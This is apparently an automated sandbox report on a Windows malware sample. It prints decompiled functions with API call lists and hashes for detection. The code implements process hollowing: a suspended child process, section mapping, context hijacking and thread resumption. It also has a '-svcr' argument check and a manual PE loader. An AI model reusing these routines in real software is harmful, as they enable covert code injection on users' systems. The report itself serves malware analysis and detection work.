										_t67 = _v568;
										if(_t67 != _t77) {
											VirtualFree(_t67, _t77, 0x8000);
										}
									}
								}
								CloseHandle(_t98);
							}
							break;
						}
						L5:
						_t95 = _t95 + 1;
					} while (_t95 < _t51);
					goto L23;
				}
			}


































                                                                                                        0x7098245a
                                                                                                        0x70982465
                                                                                                        0x7098246b
                                                                                                        0x7098246f
                                                                                                        0x7098247b
                                                                                                        0x70982489
                                                                                                        0x7098248d
                                                                                                        0x70982628
                                                                                                        0x70982633
                                                                                                        0x7098263a
                                                                                                        0x70982641
                                                                                                        0x70982645
                                                                                                        0x70982645
                                                                                                        0x7098249a
                                                                                                        0x70982621
                                                                                                        0x70982622
                                                                                                        0x00000000
                                                                                                        0x709824a0
                                                                                                        0x709824a7
                                                                                                        0x709824b0
                                                                                                        0x709824b9
                                                                                                        0x709824bd
                                                                                                        0x709824c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709824c3
                                                                                                        0x709824c6
                                                                                                        0x709824da
                                                                                                        0x709824e2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709824e8
                                                                                                        0x709824eb
                                                                                                        0x70982517
                                                                                                        0x70982529
                                                                                                        0x70982531
                                                                                                        0x7098261a
                                                                                                        0x00000000
                                                                                                        0x7098261a
                                                                                                        0x70982549
                                                                                                        0x7098254b
                                                                                                        0x7098254f
                                                                                                        0x70982555
                                                                                                        0x7098255b
                                                                                                        0x7098255c
                                                                                                        0x7098256a
                                                                                                        0x7098256e
                                                                                                        0x70982578
                                                                                                        0x70982587
                                                                                                        0x70982597
                                                                                                        0x7098259b
                                                                                                        0x7098259f
                                                                                                        0x709825a3
                                                                                                        0x709825a7
                                                                                                        0x709825b1
                                                                                                        0x709825b5
                                                                                                        0x709825d4
                                                                                                        0x709825d6
                                                                                                        0x709825db
                                                                                                        0x709825e2
                                                                                                        0x709825e9
                                                                                                        0x709825ee
                                                                                                        0x709825e2
                                                                                                        0x709825f2
                                                                                                        0x709825f8
                                                                                                        0x709825f8
                                                                                                        0x709825fa
                                                                                                        0x70982600
                                                                                                        0x70982609
                                                                                                        0x70982609
                                                                                                        0x70982600
                                                                                                        0x70982578
                                                                                                        0x70982610
                                                                                                        0x70982616
                                                                                                        0x00000000
                                                                                                        0x709824eb
                                                                                                        0x709824c8
                                                                                                        0x709824c8
                                                                                                        0x709824c9
                                                                                                        0x00000000
                                                                                                        0x70982620

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 70982453
                                                                                                        • LoadLibraryW.KERNEL32(shlwapi.dll), ref: 7098245E
                                                                                                        • LoadLibraryW.KERNEL32(shell32.dll), ref: 70982469
                                                                                                        • GetCommandLineW.KERNEL32 ref: 7098246F
                                                                                                        • CommandLineToArgvW.SHELL32 ref: 70982483
                                                                                                        • lstrcmpiW.KERNEL32(?,-svcr), ref: 709824B9
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 709824DA
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E,-00000002,?,-svcr), ref: 70982503
                                                                                                        • wsprintfW.USER32 ref: 70982517
                                                                                                        • OpenEventW.KERNEL32(00000002,00000000,?,?,?), ref: 70982529
                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,?,?,?,?), ref: 70982543
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 7098255C
                                                                                                        • CreateThread.KERNEL32 ref: 709825AB
                                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 709825DB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 709825F2
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 70982609
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 70982610
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 70982622
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 70982633
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 7098263A
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 70982641
                                                                                                        • ExitProcess.KERNEL32 ref: 70982645
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$Free$Load$CloseCommandCreateEventHandleLineThread$ArgvExitLocalMemoryOpenProcessTerminateVirtualZerolstrcmpiwsprintf
                                                                                                        • String ID: %s%s$-svcr$shell32.dll$shlwapi.dll$user32.dll
                                                                                                        • API String ID: 3497841958-2948745756
                                                                                                        • Opcode ID: 2dc47ad90e448c70427d6f42ac5771fe29b6f79f89257bb17f8db90fc4f67a13
                                                                                                        • Instruction ID: be15a505294d50f1534ef3f116f390c61e43f134eb328bd2698e5ae62dd2deb2
                                                                                                        • Opcode Fuzzy Hash: 2dc47ad90e448c70427d6f42ac5771fe29b6f79f89257bb17f8db90fc4f67a13
                                                                                                        • Instruction Fuzzy Hash: 62512AB2518301AFD3109FA5CC88B6FB7ECEB88744F104929F646963D1D774E8449BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709827F0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 125memorynativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E709827F0(WCHAR* _a4) {
				intOrPtr _v564;
				struct _CONTEXT _v736;
				struct _STARTUPINFOW _v804;
				struct _PROCESS_INFORMATION _v820;
				void* _v824;
				void* _v828;
				intOrPtr _t25;
				long* _t41;
				WCHAR* _t54;
				void* _t56;
				void* _t59;

				_t54 = _a4;
				_t41 = 0;
				if(GetFileAttributesW(_t54) == 0xffffffff) {
					return 0;
				} else {
					_t59 = HeapAlloc(GetProcessHeap(), 8, 0x618);
					if(_t59 != 0) {
						_push(_t54);
						_push(StrChrW(0x7098c530, 0x2d));
						_push(StrChrW(0x7098c514, 0x72));
						_t25 =  *0x7098f578; // 0xa51cc8
						_push(_t25);
						wsprintfW(_t59, StrChrW(0x7098c4f4, 0x22));
						_push(0x44);
						_push( &(_v804.dwX));
						L7098BF02();
						_push(0x10);
						_push( &(_v820.dwProcessId));
						_v804.lpDesktop = 0x44;
						L7098BF02();
						if(CreateProcessW(0, _t59, 0, 0, 0, 4, 0, 0,  &_v804,  &_v820) != 0) {
							_push(_v820.hProcess);
							_t56 = E709826E0();
							if(_t56 == 0) {
								L8:
								_push(0);
								_push(_v820.hProcess);
								L7098BF20();
							} else {
								_v736 = 0x10002;
								if(NtGetContextThread(_v820.hThread,  &_v736) < 0) {
									goto L8;
								} else {
									_v564 = E70982440 -  *0x7098f53c + _t56;
									if(NtSetContextThread(_v820,  &(_v804.hStdError)) < 0 || NtResumeThread(_v824, 0) < 0) {
										goto L8;
									} else {
										_t41 = 1;
									}
								}
							}
							CloseHandle(_v824);
							CloseHandle(_v828);
						}
						HeapFree(GetProcessHeap(), 0, _t59);
					}
					return _t41;
				}
			}














                                                                                                        0x709827f8
                                                                                                        0x70982800
                                                                                                        0x7098280b
                                                                                                        0x70982957
                                                                                                        0x70982811
                                                                                                        0x70982829
                                                                                                        0x7098282d
                                                                                                        0x70982833
                                                                                                        0x70982843
                                                                                                        0x7098284d
                                                                                                        0x7098284e
                                                                                                        0x70982853
                                                                                                        0x7098285f
                                                                                                        0x70982868
                                                                                                        0x7098286e
                                                                                                        0x7098286f
                                                                                                        0x70982874
                                                                                                        0x7098287a
                                                                                                        0x7098287b
                                                                                                        0x70982883
                                                                                                        0x709828a3
                                                                                                        0x709828ad
                                                                                                        0x709828b3
                                                                                                        0x709828ba
                                                                                                        0x70982914
                                                                                                        0x70982918
                                                                                                        0x7098291a
                                                                                                        0x7098291b
                                                                                                        0x709828bc
                                                                                                        0x709828c6
                                                                                                        0x709828d5
                                                                                                        0x00000000
                                                                                                        0x709828d7
                                                                                                        0x709828ee
                                                                                                        0x709828fc
                                                                                                        0x00000000
                                                                                                        0x7098290d
                                                                                                        0x7098290d
                                                                                                        0x7098290d
                                                                                                        0x709828fc
                                                                                                        0x709828d5
                                                                                                        0x7098292b
                                                                                                        0x70982932
                                                                                                        0x70982932
                                                                                                        0x7098293a
                                                                                                        0x7098293a
                                                                                                        0x7098294c
                                                                                                        0x7098294c

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 70982802
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000618,00000000,750D2940), ref: 70982820
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70982823
                                                                                                        • StrChrW.SHLWAPI(7098C530,0000002D,?), ref: 70982841
                                                                                                        • StrChrW.SHLWAPI(7098C514,00000072,00000000), ref: 7098284B
                                                                                                        • StrChrW.SHLWAPI(7098C4F4,00000022,00A51CC8,00000000), ref: 7098285B
                                                                                                        • wsprintfW.USER32 ref: 7098285F
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 7098286F
                                                                                                        • RtlZeroMemory.NTDLL ref: 70982883
                                                                                                        • CreateProcessW.KERNEL32 ref: 7098289B
                                                                                                        • NtGetContextThread.NTDLL ref: 709828CE
                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 709828F5
                                                                                                        • NtResumeThread.NTDLL(?,00000000), ref: 70982904
                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 7098291B
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000044), ref: 7098292B
                                                                                                        • CloseHandle.KERNEL32(?), ref: 70982932
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70982937
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098293A
                                                                                                          • Part of subcall function 709826E0: RtlZeroMemory.NTDLL(?,00000008), ref: 70982709
                                                                                                          • Part of subcall function 709826E0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 7098272B
                                                                                                          • Part of subcall function 709826E0: NtMapViewOfSection.NTDLL(@)u,000000FF,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982759
                                                                                                          • Part of subcall function 709826E0: NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982782
                                                                                                          • Part of subcall function 709826E0: RtlMoveMemory.NTDLL(?,70980000,?), ref: 70982796
                                                                                                          • Part of subcall function 709826E0: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 709827CD
                                                                                                          • Part of subcall function 709826E0: NtClose.NTDLL(@)u), ref: 709827D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                        • String ID: D
                                                                                                        • API String ID: 4033018722-2746444292
                                                                                                        • Opcode ID: 0a2e2e498110d9def551f24f4df53bf2600072db6ea414930ae9d41a1152523c
                                                                                                        • Instruction ID: 670fba86fea66ca5cb8483b807fb8e2d5b09ef9a435a3d265a7417c02a7c9289
                                                                                                        • Opcode Fuzzy Hash: 0a2e2e498110d9def551f24f4df53bf2600072db6ea414930ae9d41a1152523c
                                                                                                        • Instruction Fuzzy Hash: 3431BFB2208305AFD210DB66CD85FAFB7ACEBC4758F10491DB645933D0D674E8058A73
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709826E0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E709826E0() {
				char _v8;
				void* _v16;
				long _v24;
				void* _v32;
				long _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				long _v80;
				void* _v88;
				void* _v92;
				void* _v120;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _t45;
				void* _t58;
				intOrPtr _t59;

				_t58 =  *0x7098f53c; // 0x70980000
				_t1 = _t58 + 0x3c; // 0xf0
				_t59 =  *_t1;
				_t45 = 0;
				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
					_push(8);
					_push( &_v8);
					_v24 = 0;
					L7098BF02();
					_v16 =  *(_t59 + _t58 + 0x50);
					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
						_v48 = 0;
						_v44 = 0;
						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
							_v88 = 0;
							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
								if(E70982650(_v132, _v136) == 0) {
									NtUnmapViewOfSection(_v140, _v136);
								} else {
									_t45 = _v136;
								}
							}
							NtUnmapViewOfSection(0xffffffff, _v120);
						}
						NtClose(_v92);
					}
				}
				return _t45;
			}





















                                                                                                        0x709826e6
                                                                                                        0x709826ec
                                                                                                        0x709826ec
                                                                                                        0x709826ef
                                                                                                        0x709826f8
                                                                                                        0x709826fe
                                                                                                        0x70982704
                                                                                                        0x70982705
                                                                                                        0x70982709
                                                                                                        0x70982727
                                                                                                        0x70982732
                                                                                                        0x70982751
                                                                                                        0x70982755
                                                                                                        0x70982760
                                                                                                        0x7098277e
                                                                                                        0x70982789
                                                                                                        0x70982796
                                                                                                        0x709827af
                                                                                                        0x709827c1
                                                                                                        0x709827b1
                                                                                                        0x709827b1
                                                                                                        0x709827b1
                                                                                                        0x709827af
                                                                                                        0x709827cd
                                                                                                        0x709827cd
                                                                                                        0x709827d7
                                                                                                        0x709827d7
                                                                                                        0x70982732
                                                                                                        0x709827e4

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 70982709
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 7098272B
                                                                                                        • NtMapViewOfSection.NTDLL(@)u,000000FF,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982759
                                                                                                        • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982782
                                                                                                        • RtlMoveMemory.NTDLL(?,70980000,?), ref: 70982796
                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 709827C1
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 709827CD
                                                                                                        • NtClose.NTDLL(@)u), ref: 709827D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                        • String ID: @)u
                                                                                                        • API String ID: 1304417992-403505584
                                                                                                        • Opcode ID: d58b559f8bcbc656c55be40ea4cf9fef354c51de0d86a37e036cccd1b847c527
                                                                                                        • Instruction ID: a077e312b0257e061b64e6b28c980f1a733225f16710c960f13fe4a10d6f7621
                                                                                                        • Opcode Fuzzy Hash: d58b559f8bcbc656c55be40ea4cf9fef354c51de0d86a37e036cccd1b847c527
                                                                                                        • Instruction Fuzzy Hash: 603105B1208305BFE200DA65CD81E6BB3ECABC8658F444A1CB69596285D674FC058B72
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985220, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processnativesynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E70985220(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				WCHAR* _v12;
				struct _STARTUPINFOW _v84;
				char _v92;
				void* _v96;
				void* _v100;
				signed int _t17;
				signed int _t23;
				long _t27;
				DWORD* _t30;
				intOrPtr _t33;
				struct _PROCESS_INFORMATION* _t44;

				_t44 =  &_v84;
				_push(0x44);
				_push( &(_v84.dwX));
				L7098BF02();
				_push(0x10);
				_push( &_v92);
				L7098BF02();
				_t17 = _v8;
				_v84.cb = 0x44;
				if(_t17 == 0) {
					_v84.dwFlags = 1;
				}
				_t33 = _a12;
				if(_t33 != 0) {
					_v84.lpDesktop = _t33;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
					return 0;
				} else {
					_t23 = _v4;
					if(_t23 != 0) {
						if(_t23 == 0xffffffff) {
							_t27 = _t23 | 0xffffffff;
						} else {
							_t27 = _t23 * 0x3e8;
						}
						if(WaitForSingleObject(_v100, _t27) != 0) {
							if(_a4 != 0) {
								_push(0);
								_push(_v100);
								L7098BF20();
							}
						} else {
							_t30 = _v0;
							if(_t30 != 0) {
								GetExitCodeProcess(_v100, _t30);
							}
						}
					}
					CloseHandle(_v96);
					CloseHandle(_v100);
					return 1;
				}
			}

















                                                                                                        0x70985220
                                                                                                        0x70985223
                                                                                                        0x70985229
                                                                                                        0x7098522a
                                                                                                        0x7098522f
                                                                                                        0x70985235
                                                                                                        0x70985236
                                                                                                        0x7098523b
                                                                                                        0x7098523f
                                                                                                        0x70985249
                                                                                                        0x7098524b
                                                                                                        0x7098524b
                                                                                                        0x70985253
                                                                                                        0x70985259
                                                                                                        0x7098525b
                                                                                                        0x7098525b
                                                                                                        0x70985271
                                                                                                        0x7098528e
                                                                                                        0x70985302
                                                                                                        0x70985290
                                                                                                        0x70985290
                                                                                                        0x70985296
                                                                                                        0x7098529b
                                                                                                        0x709852a5
                                                                                                        0x7098529d
                                                                                                        0x7098529d
                                                                                                        0x7098529d
                                                                                                        0x709852b5
                                                                                                        0x709852d1
                                                                                                        0x709852d6
                                                                                                        0x709852d8
                                                                                                        0x709852d9
                                                                                                        0x709852d9
                                                                                                        0x709852b7
                                                                                                        0x709852b7
                                                                                                        0x709852bd
                                                                                                        0x709852c4
                                                                                                        0x709852c4
                                                                                                        0x709852bd
                                                                                                        0x709852b5
                                                                                                        0x709852ea
                                                                                                        0x709852f1
                                                                                                        0x709852fc
                                                                                                        0x709852fc

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 7098522A
                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 70985236
                                                                                                        • CreateProcessW.KERNEL32 ref: 70985286
                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 709852AD
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 709852C4
                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 709852D9
                                                                                                        • CloseHandle.KERNEL32(00000044,750D2940), ref: 709852EA
                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 709852F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                        • String ID: D
                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                        • Opcode ID: fe95927e144eb93ed3208e543a5dfd273c1710e1ca6260259c92b89189ff7185
                                                                                                        • Instruction ID: 301ae07f4bff29488904f28c69c4d59d34b527d9b392caa24fc7ebe16aa89411
                                                                                                        • Opcode Fuzzy Hash: fe95927e144eb93ed3208e543a5dfd273c1710e1ca6260259c92b89189ff7185
                                                                                                        • Instruction Fuzzy Hash: CA212FB1618301ABE614DB64CC85F5F73EDAB84B04F204A1DB5A6D73D0DB74E8088B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981A80, Relevance: 9.1, APIs: 6, Instructions: 143memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E70981A80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				void* _v44;
				intOrPtr _v172;
				char _v356;
				long _v360;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t69;
				intOrPtr _t70;
				intOrPtr* _t83;
				signed int _t85;
				intOrPtr _t88;

				_t82 = _a4;
				_t69 = 0;
				if(_a4 != 0) {
					_t91 = _a8;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v4 = 0;
					_t88 = E70981490( &_v356, _t82, _a8);
					if(_t88 != 0) {
						_t83 = _a16;
					} else {
						_t70 = _a12;
						_push( &_v356);
						_t88 = E70981570(_t70);
						if(_t88 != 0) {
							_t83 = _a16;
						} else {
							_t88 = E70981650( &_v356, _t82, _t91, _t70);
							if(_t88 != 0) {
								L18:
								_t83 = _a16;
								goto L19;
							} else {
								_t88 = E709816F0( &_v356);
								if(_t88 != 0) {
									goto L18;
								} else {
									_t88 = E709817B0( &_v356);
									if(_t88 != 0) {
										if(_v24 != 0) {
											_t85 = 0;
											if(_v20 > 0) {
												do {
													FreeLibrary( *(_v24 + _t85 * 4));
													_t85 = _t85 + 1;
												} while (_t85 < _v20);
											}
											HeapFree(GetProcessHeap(), 0, _v24);
										}
										goto L18;
									} else {
										_t88 = E70981960( &_v356);
										if(_t88 != 0) {
											goto L18;
										} else {
											_t83 = _a16;
											if(_t83 != 0) {
												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
												_v8 =  *((intOrPtr*)(_t83 + 0x30));
											}
											_t88 = E70981A30( &_v356, _t70);
											if(_t88 != 0) {
												L19:
												_push(0x8000);
												_push( &_v360);
												_push( &_v28);
												_push(0xffffffff);
												_v360 = 0;
												L7098BEEA();
											} else {
												if(_t83 != 0) {
													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
													 *((intOrPtr*)(_t83 + 8)) = _t70;
													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
													 *(_t83 + 0x1c) = _v24;
													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
												}
											}
										}
									}
								}
							}
						}
						_t52 = _v44;
						if(_t52 != 0) {
							HeapFree(GetProcessHeap(), 0, _t52);
						}
						_t69 = 0;
					}
					if(_t83 != _t69) {
						 *_t83 = _t88;
					}
					return _t88;
				} else {
					_t2 = _t69 - 2; // -2
					return _t2;
				}
			}























                                                                                                        0x70981a88
                                                                                                        0x70981a8f
                                                                                                        0x70981a93
                                                                                                        0x70981aa2
                                                                                                        0x70981ab0
                                                                                                        0x70981ab7
                                                                                                        0x70981abe
                                                                                                        0x70981ac5
                                                                                                        0x70981acc
                                                                                                        0x70981ad8
                                                                                                        0x70981adf
                                                                                                        0x70981c70
                                                                                                        0x70981ae5
                                                                                                        0x70981ae5
                                                                                                        0x70981af0
                                                                                                        0x70981af8
                                                                                                        0x70981aff
                                                                                                        0x70981c4a
                                                                                                        0x70981b05
                                                                                                        0x70981b11
                                                                                                        0x70981b18
                                                                                                        0x70981c20
                                                                                                        0x70981c20
                                                                                                        0x00000000
                                                                                                        0x70981b1e
                                                                                                        0x70981b26
                                                                                                        0x70981b2d
                                                                                                        0x00000000
                                                                                                        0x70981b33
                                                                                                        0x70981b38
                                                                                                        0x70981b3c
                                                                                                        0x70981bdf
                                                                                                        0x70981be1
                                                                                                        0x70981bea
                                                                                                        0x70981bf2
                                                                                                        0x70981bfd
                                                                                                        0x70981bff
                                                                                                        0x70981c00
                                                                                                        0x70981bf2
                                                                                                        0x70981c1a
                                                                                                        0x70981c1a
                                                                                                        0x00000000
                                                                                                        0x70981b42
                                                                                                        0x70981b47
                                                                                                        0x70981b4b
                                                                                                        0x00000000
                                                                                                        0x70981b51
                                                                                                        0x70981b51
                                                                                                        0x70981b5a
                                                                                                        0x70981b62
                                                                                                        0x70981b69
                                                                                                        0x70981b69
                                                                                                        0x70981b7a
                                                                                                        0x70981b81
                                                                                                        0x70981c27
                                                                                                        0x70981c27
                                                                                                        0x70981c30
                                                                                                        0x70981c38
                                                                                                        0x70981c39
                                                                                                        0x70981c3b
                                                                                                        0x70981c43
                                                                                                        0x70981b87
                                                                                                        0x70981b89
                                                                                                        0x70981ba4
                                                                                                        0x70981bae
                                                                                                        0x70981bb8
                                                                                                        0x70981bc2
                                                                                                        0x70981bc9
                                                                                                        0x70981bcc
                                                                                                        0x70981bcf
                                                                                                        0x70981bd2
                                                                                                        0x70981bd2
                                                                                                        0x70981b89
                                                                                                        0x70981b81
                                                                                                        0x70981b4b
                                                                                                        0x70981b3c
                                                                                                        0x70981b2d
                                                                                                        0x70981b18
                                                                                                        0x70981c51
                                                                                                        0x70981c5a
                                                                                                        0x70981c66
                                                                                                        0x70981c66
                                                                                                        0x70981c6c
                                                                                                        0x70981c6c
                                                                                                        0x70981c79
                                                                                                        0x70981c7b
                                                                                                        0x70981c7b
                                                                                                        0x70981c89
                                                                                                        0x70981a96
                                                                                                        0x70981a96
                                                                                                        0x70981aa0
                                                                                                        0x70981aa0

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70981C5F
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981C66
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859560861-0
                                                                                                        • Opcode ID: 23c5da97fae7e041a163c754a08676a8530cc422b19d05140e7b18f3a8e4d45a
                                                                                                        • Instruction ID: 165130ba94b4bed1e85e9904edcfae27d525800e4cf05e91030fedd47d0bb677
                                                                                                        • Opcode Fuzzy Hash: 23c5da97fae7e041a163c754a08676a8530cc422b19d05140e7b18f3a8e4d45a
                                                                                                        • Instruction Fuzzy Hash: 835139B2948341DBC3318F55C880BDFB3E9BB88350F114A2DE89A97380D735A8458B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B9A29, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004B9A42
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9A6F
                                                                                                        • _malloc.LIBCMT ref: 004B9AD8
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9AF0
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
